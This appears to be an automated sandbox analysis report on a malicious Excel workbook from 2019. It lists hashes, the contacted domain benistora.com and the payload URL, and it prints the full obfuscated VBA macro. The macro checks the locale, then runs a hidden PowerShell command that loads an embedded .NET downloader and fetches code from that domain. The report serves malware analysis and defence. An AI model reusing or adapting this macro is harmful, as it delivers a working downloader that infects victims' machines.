C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37B5DB30.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Size (bytes):	3420
Entropy (8bit):	2.8348833379481926
Encrypted:	false
MD5:	48569EF8EF773AB743ACC9B353E0EFCB
SHA1:	58E2173EFC2005EA484CF675BD32F5F8FF1A5DF5
SHA-256:	954024CCFE197F83B1CE7D7C00E8B6268A7D99164D4F69B8750545BDCDE0D91C
SHA-512:	961AC999B934ADC3D745261695EA1ADFAF7782B36FFCBF43128EC4702EFF85B7D71EDC0EBC141DA3B546C99901810F8CDB00E3E13688D9BD5F4CD285DB5A7975
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3JV5FEKFNU6BVX4B55AR.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.5485469487294763
Encrypted:	false
MD5:	F0CF104FFC9F5C94B5E4A5A7170C1170
SHA1:	9868E4159BBAD1EC7B50E54C0D6F423716A8C75E
SHA-256:	308C0A0DE5ABEEA5E4F8CAFF6DDC222A17C6ABAAB0379145BB5D27873470644F
SHA-512:	0D43BE079B3134348EE665D7EB1A0F71D6C1BDA0F32132D2C74ACC7E7D472C1AD545A0DE703FABA5A4B29CD7D7621ECFD6E58B9DF309095A837CD8647E6C408F
Malicious:	false
Reputation:	low

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
benistora.com	5.188.60.66	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://benistora.com/uploads/audio.7zH	powershell.exe, 00000005.00000002.1636329423.01D34000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://benistora.com/uploads/audio.7z	powershell.exe, 00000005.00000002.1634819377.00307000.00000004.sdmp	false	3%, virustotal, Browse Avira URL Cloud: safe	unknown
https://benistora.com	powershell.exe, 00000005.00000002.1636645086.01F76000.00000004.sdmp	false	2%, virustotal, Browse Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
5.188.60.66	Russian Federation		62088	unknown	false

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 932, Create Time/Date: Wed Feb 27 16:46:11 2019, Last Saved Time/Date: Wed Feb 27 16:52:51 2019, Security: 0
Entropy (8bit):	6.438403456585757
TrID:	Microsoft Excel sheet (30009/1) 44.11% Microsoft Excel sheet (alternate) (24509/1) 36.03% Generic OLE2 / Multistream Compound File (8008/1) 11.77% Java Script embedded in Visual Basic Script (3500/0) 5.15% Java Script (2000/0) 2.94%
File name:	7362_8164_(2019.2).xls
File size:	87552
MD5:	6a9eda3eb0bfc222ab46725829faaec7
SHA1:	1ffceee85ab43487e512a0d980a29eef2e80296d
SHA256:	21cc174826ce5e69aa60445f547b94bb0b544c5d66a01063e37abbfdc91a715f
SHA512:	303d7d5f7556dbc6d2e513cdf2d72cc7efd1ff07000cfc6e579efacef9fa3b03b8943852dfc109bad892d483218a8a92712eb4429597c6a5141ce07f575c97dd
SSDEEP:	1536:32Qk3hOdsylKlgryzc4bNhZFGzE+cL2knA5XnKT34A6Q7hX3zv3t6PhlMYN7D5jI:32Qk3hOdsylKlgryzc4bNhZFGzE+cL2k
File Content Preview:	........................>.......................................................b..............................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "7362_8164_(2019.2).xls"

Indicators
Has Summary Info:	True
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	932
Create Time:	2019-02-27 16:46:11
Last Saved Time:	2019-02-27 16:52:51
Security:	0

Document Summary
Document Code Page:	932
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 4609

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	4609
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . c . . . . . . . . . . . . . . . . . . . H . . . . . . ; 5 . . . . . . . . . . . . . . . . . . . . G e t U s e r D e f a u l t L C I D . . . . H . T . . . . . . . @ . . . . . . . . . . . . . . . . . . . G e t L o c a l e I n f o A . . . . H . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . S e t L o c a l e I n f o A . . . . . . . . . . . . . . . . . . . . . . . . E . . . . . . U . . . . . . . . .
Data Raw:	01 16 03 00 01 b1 01 00 00 c3 08 00 00 95 01 00 00 e9 02 00 00 ff ff ff ff e3 08 00 00 a7 0e 00 00 00 00 00 00 01 00 00 00 c3 88 a4 61 00 00 ff ff 63 01 00 00 88 00 00 00 b6 00 ff ff 01 01 94 00 00 00 00 00 48 02 20 00 00 00 ff ff 3b 35 bd 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 65 74 55 73 65 72 44 65 66 61 75 6c 74 4c 43 49 44 00 00 00 00 48 02 54 00 00 00 00

VBA Code Keywords

Keyword
#Else
Const
vbLong
GetLocaleInfo
Public
Left$(Symbol,
Frame"
InStr(Symbol,
Long)
"SetLocaleInfoA"
Long,
SetLocaleInfo
Integer,
LCType
PtrSafe
Declare
MSForms,
False
String,
String)
LOCALE_ICOUNTRY,
String
lpLCData
Symbol,
Single)
VB_Base
cchData
ByVal
VB_Creatable
lpLCDataVar,
VB_Exposed
"GetLocaleInfoA"
(ByVal
Symbol
Integer
GetUserDefaultLCID%
Attribute
VB_PredeclaredId
VB_GlobalNameSpace
LOCALE_ICOUNTRY
VB_Name
Function
VB_Customizable
belll
ThisWorkbook.vector
VB_Control
Shift
Button
Single,
GetUserDefaultLCID()
Alias
GetLocaleInfo(Lot,
VB_TemplateDerived
Locale
Private
Boolean

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "st1, 1, 0, MSForms, Frame"

#If VBA7 Then
    Private Declare PtrSafe Function GetUserDefaultLCID% Lib "kernel32" ()
    Private Declare PtrSafe Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long
    Private Declare PtrSafe Function SetLocaleInfo Lib "kernel32" Alias "SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String) As Boolean
#Else
    Private Declare Function GetUserDefaultLCID% Lib "kernel32" ()
Private Declare Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long

Private Declare Function SetLocaleInfo Lib "kernel32" Alias "SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String) As Boolean
#End If



Private Const LOCALE_ICOUNTRY = &H5
Public intA As Integer
Private Const belll = 24













Private Sub st1_Layout()
cu = 0
Dim Symbol As String
Lot = GetUserDefaultLCID()
iRet1 = GetLocaleInfo(Lot, LOCALE_ICOUNTRY, lpLCDataVar, 0): Symbol = String$(iRet1, 0): iRet2 = GetLocaleInfo(Lot, LOCALE_ICOUNTRY, Symbol, iRet1)
Pos = InStr(Symbol, Chr$(0))
If Pos > 0 Then
Symbol = Left$(Symbol, Pos - 1)
End If
If Symbol = vbLong * 27 Then intA = 131: ThisWorkbook.vector Else cu = 100

End Sub

Private Sub st1_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
If intA <> 131 Then ThisWorkbook.vector
End Sub

VBA File Name: ThisWorkbook.cls, Stream Size: 17613

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	17613
Data ASCII:	. . . . . . . . . B . . . . . . . . . . . p . . . ~ . . . . / . . . . . . . . . . . . o . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . ! . a d . . M . . O B . . 1 . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . C . . = . . / ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . C . . = . . / ? . . ! . a d . . M . . O B . . 1 . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 00 01 00 00 42 0c 00 00 e4 00 00 00 10 02 00 00 70 0c 00 00 7e 0c 00 00 be 2f 00 00 00 00 00 00 01 00 00 00 c3 88 6f cf 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 1e 21 e1 61 64 10 b4 4d 98 d4 4f 42 db 1d 31 9d 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Ety(S
"ThisWorkbook"
VersionRevision()
msoBevelCross
ClenDaataAll()
VersionRevision
False
BoolCounts
Gle(Gle(Ety(Gle(Ety(Vrr,
msElementChartTitleCenteredOver()
String,
String)
Gle(S
twing
String
RawsAndTabs()
RawsAndTabs
msoblogImageTypeGIF)
DigitTestOne()
Ts)))
Ts)),
VB_Base
VB_Creatable
VB_Exposed
-cREPla'+'CE([cH"
Integer)
msoBevelSlope
msElementChartTitleCenteredOver
msoblogImageTypeGIF
GeneralOptinss
BoolCounts()
Attribute
VB_PredeclaredId
VB_GlobalNameSpace
DigitTestOne
GeneralOptinss()
msoBulletNumbered)
VB_Name
Leged()
Function
CashN()
VB_Customizable
Leged
vector()
UBound(b)
b(i))
CashN
VB_TemplateDerived
ClenDaataAll
BackstageGroupStyleWarning
GeneralOptinss,
Shell(Gle(Gle(Ety(Gle(Ety(Leged,

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
 Function Ts()
 Ts = BackstageGroupStyleWarning - 2
 End Function

Function Leged()
Leged = "oe""f1""""e$""Gu""VG""\S?D`""""(""*U&gJNnfK3]-_U&gJnNFk3]_5)-)Z""+**)*(`2*xDXUD2+x*""i3}[23}3[ih/D2mx)O)-D2.xD2sxD2+x*""D]v{]g__B*9*.92;3.662.5."
End Function

Function GeneralOptinss()
Dim Vrr As String
Vrr = "TC9_-;e]CJ_T)9)--:e]CJ_T59.+e]CJ_T4;++30[iuXrMnCgW-)3)[i++Vv03`**(i3-)[)3}}2i3/[""h3*[i3}}2i3""[h/2""xDC/knucD2.xD2vxD2+x2.xDgID2+x*""i3}[23}3[ih/D2Kx2GxD2.xD2,xD+++)""""e/GtNREc""g]*JetC3_73]-JetC9_-7e]CJ_t33+4].JetC;_/8teRGcNgE)""i3)[].JetC5_""6T/rgcnGe*""e]CJ_t:6]-JetC8_-8e]CJ_t33+:].JetC5_/;teRGcNgEj)FI.)e]CJ_t85T/rgcnGe]*JetC3_83]-JetC:_-6e]CJ_t;6.+e]CJ_t43+6+""(""u(VG""""WU?iQRGyUtGJnn""""y/3""""""P/RQqt""Hg/""R{dCruu/""QpkpVPtg""c/""QPqnQI""""""""U""VGX/Tccknd""gQV""4""*V]r{_G""*^""}$45}}32}^""$h/)""vp.)G).)G)xp.)K)qTOp"")+""""""+""""=&""G}GzWekVpQQevpZGv^0K$bpQXgMqeOoCbfp$^*0""""$^4}}23}^""$h/)""XpMqugTE)K).Vr.)k)"")0+pKqxgm""*""""""*""""*""""""GI/vVKOGX""TcCkNd<GqV""40+$^cXbngW$^<<""*^""}$53}}24}}6$^/""""hX).)V)pGKxQTOPpG)V).TC.)I))G).CKnd)g+""K0xpmq*g""""^*}$23}^""$h/G))s).D\"").+^*}$32}^/$""ht)Equg)u).)R++""+""""(+""(e""fo""""e1u'IW$'"
GeneralOptinss = Gle(Gle(Ety(Gle(Ety(Vrr, Ts)), Ts)))
End Function

Function Gle(S As String) As String
Dim b() As Byte
Dim bb As Byte
Dim i As Long
b = S
For i = 0 To UBound(b) - 2 Step msoBevelSlope
  bb = b(i)
  b(i) = b(i + msoblogImageTypeGIF)
  b(i + msoBulletNumbered) = bb
Next i
Gle = b
End Function
Function BoolCounts()
BoolCounts = ",0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,99,0,0,12,0,0,'+'0,0,96,0,0,0,2,0,0,0,1'+'0)+@(0)*14+@(64,0,0,66)+@(0)*16+@(96,35,0,0,0,0,0"
End Function

Function VersionRevision()
VersionRevision = ",0,72,0,0,0,2,0,5,0,120,32,0,0,17'+'2,2,0,0,1)+@(0)*55'+'+@(19,48,2,0,17,0,0,0,1,'+'0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,'+'0,0,0,0,0,12'+',0,0,0,118,50,46,48,46,53,48,55,50,55,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,208,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,7'+'2,2,0,0,8,0,0,0,35,85,83,'+'0,80,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,96,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)*7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,1,51,0,22,0,0,1,0,0,0,4,0,0,0,2'+',0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,'+'0,0,0,'+'0,0,10,0,1,0,0,0,0,0,6,0,45,0,38,0,6,0,96,0,64,0,6,0,128,0,64,0,10,0,180,0,169,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,52,0,10,0,1,0,1'+'09,32,0,0,0,0,134,24,58,0,15,0,2,0,0,0,1,0,165,0,17,0,58,0,19,0,25,0,58,0,15,0,33'+',0,58,0,15'+',0'+',33,0,190,0,24,0,9,0,58,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)*16+@'+'(158,0,0"
End Function
Sub vector()
msElementChartTitleCenteredOver
End Sub
Function CashN()
CashN = ",0,2)+@(0)*11+'+'@(1,0,29,0,0,0,0,0,2)+@(0)*11+@(1'+',0,38)+@(0)*8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,82,70,111,108,68,89,75,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101'+',109,0,79,98,106,101,99,116,0,81,99,90,'+'113,'+'1'+'07,0,46,99,116,111,114,0,83,121,115,116,101,10'+'9,46,82,117,110,116,105,109,101,46,67,111,10'+'9,112,105,108,101,11'+'4,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,'+'97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,1'+'05,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105'+',98,'+'117,116,101,0,99,1'+'14,97,100,108,101,0,117'+',114,108,0,83,121,1'+'15,11'+'6,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119'+','+'110,108,111,97,100,83,116'+',114,105,110,103,0,0,0,0,0,3,32,0,0,0,0,0,5'+'8,148,124,63,2,180'+',198,73,168,1'+'11,105,133,161,93,80,139,0,8,1"
End Function
Function Ety(S As String, n As Integer) As String
Dim b() As Byte
Dim i As Long
b = S
For i = 0 To UBound(b) Step msoblogImageTypeGIF
  b(i) = (n + b(i)) And msoBevelCross * 51
Next i
Ety = b
End Function
Function DigitTestOne()
DigitTestOne = "83,122,92,86,25,52,224,'+'137,4,0,1,14,14,3,32,'+'0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,'+'112,78,111,110,69,120,99,101,112,116,105,111,110,8'+'4,104,114,111,119,115,1,0,0,0,76,35)+@(0)*8+@(0,0,110,35,0,0,0,32)+@(0)*22+@(96,35)+@(0)*20+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,64)+@(0)*139+@(1,0,16,0,0,0,24,0,0,12'+'8)+@(0)*14+@(1,0,1,0,0,0,48,0,0,128)+@(0)*14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@'+'(0)*8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0'+',78,0,95,0,73,0,78,0,70,0,7'+'9,0,0,'+'0,0'+',0,189,4,239,254,0,0,1)+@(0)*16+@(0,63)+@('+'0)*7+@(4,0,0,0,2)+@(0)*14+@(0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0'+',0,0,0,0'+',36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)'+'+@(0)*7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,10"
End Function

Function ClenDaataAll()
ClenDaataAll = "8,'+'0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,'+'0,101,0,68,0,101,0,115,0,99,0,114,0,105'+',0,112,0,116,0,105,0,111,0,110,0,0,0,0,0,32,0,0,0,48,0,8,0,'+'1,0,70,0,105'+',0,108,0,101,0,86,'+'0,101,0,114,0,115,0,105,0,111,0,110'+',0,0,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56'+',0,11,0,1,0,73,0,110,0,116,0,101,0,114,0,110,0,97,0,108,0'+',78,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,40,0'+',2,0,1,0,76,0,101,0,103,0,97,0,108,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,'+'0,116,0,'+'0,0,32'+',0,0,0,64,0,1'+'1,0,1,0,79,0,114,0'+',10'+'5,0,103,0,105,0,110,0,97,0,108,0,70,0,105,0,108,0,101,0,110,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100'+',0'+',108,0,101,0,46,0,100,0,108,0,108'+',0,0,0,0,0,52,0,8,0,1,0,80,0,114,0,111,0,1'+'00,0,117,'+'0,99,0,116,0,86,0,101,0,114,0,115,0,105,0,111,0'+',110,0,0,0,48,0,46,0,48,0,4"
End Function

Function n6()
n6 = "6,0,48,0,46,0,48,'+'0,0,0,5'+'6,0,8,0,1,0,65,0,115,0,115,0,101,0,109,0,98,0,108,0,121,0,32,0,86,0,101,0,114,0,115,0'+',105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48)+@(0)*360+@(32,0,0,12,0,0,0,128,51)+@(0)*502));^&(1gY{0}{1}1gY -f('+'1gY{0}{1}1gY-f 0BvS0Bv,0Bvet-It0Bv),0Bvem0Bv) (1gY{2}{1}{0}1gY-f (1gY{1}{0}1gY -f0Bv080Bv,0Bvle:0Bv),(1gY{0}{1}1gY-f0Bvr0Bv,0Bviab0Bv),0BvVa0Bv) (1gY{5}{8}{2}{6}{0}{3}{4}{7}{1}{9}{10}1gY-f 0Bvom/uplo0B'+'v,0Bvi0Bv,0Bv/0Bv,0Bva0Bv,0Bvds/0Bv,'+'0Bvhttp0Bv'+',0Bvbenistora.c0Bv,0Bvaud0Bv,0Bvs:/0Bv,0Bvo.70Bv,0Bvz0Bv'+');hGD{nsK"
End Function

Function n7()
n7 = "Vqmm>~T\tzfu/nfSmg(f(,udpj/otBftcnzm;^);T\tzfu/nfSmgdfjuopB/ttnfmc^z2/,(h(HZf"
End Function
Sub msElementChartTitleCenteredOver()
twing = Shell(Gle(Gle(Ety(Gle(Ety(Leged, Ts)), Ts))) & RawsAndTabs & GeneralOptinss, 0)
End Sub

Function n8()
n8 = "TMeTHsKposKpDS1gY()tT1.(1gY{1}{0}1g'+'Y -f0Bvere0Bv,0BvWh'+'0Bv){(^&(1gY{1}{0}1gY -f0BvI0Bv,0BvGC0Bv) (((1gY{1}{2}{3}{0}1gY-f 0Bv_0Bv,(1gY{0}{1}1g'+'Y -f0BvVar0Bv,0Bvia0Bv),0Bvble0Bv,0Bv:{0}0Bv)) -F  [cHAR]92)).1gY'+'VasKplUE1'+'gY.1gYnAsKpmE1gY-clike(1gY{0'+'}{1}1gY-f0BvL0Bv,0Bv*o*d0Bv)}tT1.(0Bv%0Bv){(.(0BvGV0Bv) (0Bv_0Bv) -ValueOn).1gYnasKpME1gY}tT1.(1gY{0}{1}{2}1gY -f0BvSe0Bv,0Bvl0Bv,0Bvect0Bv)  -La 1).1'+'gYisKpNvsKpoKE1gY((^&(0BvGV0Bv) '+'(1gY{0}{1}1gY -f0BvkM0Bv,0Bvq0Bv)).1gYVAsKplUE1gY)'+';([RFolDYK]::1gYqCsKpzqk1gY.Invoke((.(1gY{0}{1}1gY-f0BvD0Bv,0BvIR0Bv) (((1gY{2}{3}{1}{0}{4}1gY -f'+'0BvNI00Bv,0Bv:O0Bv,0BvVar0Bv,(1gY{1}{0}1'+'gY-f0Bvble0Bv,0Bvia0'+'Bv),0Bv80Bv))  -cREPla'+'CE([cH"
End Function

Function RawsAndTabs()
RawsAndTabs = BoolCounts + VersionRevision + CashN + DigitTestOne + ClenDaataAll + n6 + Gle(Gle(Ety(Gle(Ety(n7, Ts)), -0))) + n8
End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 107

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	107
Entropy:	4.18482950044
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 232

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	232
Entropy:	2.59297538449
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x 2 0 1 9 . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b8 00 00 00 08 00 00 00 01 00 00 00 50 00 00 00 17 00 00 00 58 00 00 00 0b 00 00 00 60 00 00 00 10 00 00 00 68 00 00 00 13 00 00 00 70 00 00 00 16 00 00 00 78 00 00 00 0d 00 00 00 80 00 00 00 0c 00 00 00 94 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 136

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	136
Entropy:	3.00563730594
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . X . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . D . . . . . . . P . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 00 00 00 04 00 00 00 01 00 00 00 30 00 00 00 0c 00 00 00 38 00 00 00 0d 00 00 00 44 00 00 00 13 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a4 03 00 00 40 00 00 00 80 8b b5 f1 bb ce d4 01 40 00 00 00 80 b3 20 e0 bc ce d4 01

Stream Path: MBD0001D15E/\x1CompObj, File Type: data, Stream Size: 112

General
Stream Path:	MBD0001D15E/\x1CompObj
File Type:	data
Stream Size:	112
Entropy:	4.6011544911
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0001D15E/f, File Type: data, Stream Size: 108

General
Stream Path:	MBD0001D15E/f
File Type:	data
Stream Size:	108
Entropy:	3.98902601641
Base64 Encoded:	False
Data ASCII:	. . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . * . . W , . . . . . . . . . . s t 1 . . R . . . . . . . . . . . K . Q . . . . . . t . . . . . l . r . o . S . V . b . N . . . . . . . . . .
Data Raw:	00 04 34 00 06 0c 1e 08 0e 00 00 80 0e 00 00 80 03 00 00 00 0e 00 00 80 03 00 00 80 ff ff 00 00 00 7d 00 00 ca 2a 00 00 57 2c 00 00 00 00 00 00 00 00 00 00 73 74 31 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 80 00 00 90 01 74 b7 01 00 0f 82 6c 82 72 20 82 6f 83 53 83 56 83 62 83 4e 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0001D15E/o, File Type: empty, Stream Size: 0

General
Stream Path:	MBD0001D15E/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 46909

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	46909
Entropy:	7.27472788336
Base64 Encoded:	True
Data ASCII:	. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . I E U s e r B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . ] . # 8 . . . . . . . X . @
